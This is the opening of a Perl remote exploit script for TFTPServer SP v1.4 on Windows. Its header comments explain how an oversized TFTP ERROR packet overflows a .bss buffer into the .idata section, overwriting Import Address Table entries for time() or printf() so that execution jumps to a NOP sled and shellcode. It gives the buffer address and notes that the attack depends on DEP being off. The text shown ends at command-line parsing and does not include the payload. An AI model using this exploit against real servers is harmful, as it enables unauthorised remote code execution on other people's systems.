TFTP Server for Windows 1.4 - ST Remote BSS Overflow Exploit
#!/usr/bin/perl
# TFTPServer SP v1.4 for Windows remote .bss overflow exploit
# Works against both the Service build and the RunStandAlone build.
# URL: http://sourceforge.net/projects/tftp-server/
#
# Author: tix or tixxDZ <tixxdz@gmail.com>
# Date: 07/05/2008
#
# Tested on an unpatched Windows XP SP2 (French locale)
#
# TFTPServer SP v1.4 mishandles an overly long TFTP ERROR packet (opcode 5):
# the error message is copied into a fixed-size buffer in .bss and overflows it.
# Other versions may also be vulnerable (untested).
#
# TFTPServer follows RFC 1350 for ERROR packets; many other TFTP servers do not.
# RFC 1350 lays an ERROR packet out as: opcode (\x00\x05) | 2-byte ErrorCode | ErrMsg | \x00.
# TFTP Error Packet: "\x00\x05" . ErrorMsg . "\x00"
#   (with this layout the first two bytes of ErrorMsg occupy the ErrorCode field)
#
# BUFFER is at 0041B3AB in the .bss section of the v1.4 binary.
# The overflow runs past the end of .bss into the adjacent .idata section, which
# lets this exploit patch function addresses in the Import Address Table (IAT).
# These addresses are image-specific: another build of TFTPServer needs new offsets.
#
# For the TFTPServer Service we patch the IAT entry for time()
# For the TFTPServer StandAlone program we patch the IAT entry for printf()
# (the program's next call through the patched slot then lands in the shellcode)
#
# BUFFER = NOPS + SHELLCODE + RET
# The sled and shellcode end up in the .idata section; RET (presumably the value
# written into the patched IAT slot) points back into that sled. This works because
# .idata is mapped RWE in this binary -- it relies on DEP not being enforced for
# the target process.
use strict;
use IO::Socket::INET;
# First command-line argument: the TFTP server to attack.
# Abort with the usage text when it is missing (or empty/"0", which is also
# treated as absent).
my $target = shift @ARGV
    or die "Usage: $0 <target> <type>\n <type> : type of the program\n".
           "\t<s> for a TFTP service\n\t<p> for a TFTP simple program\n";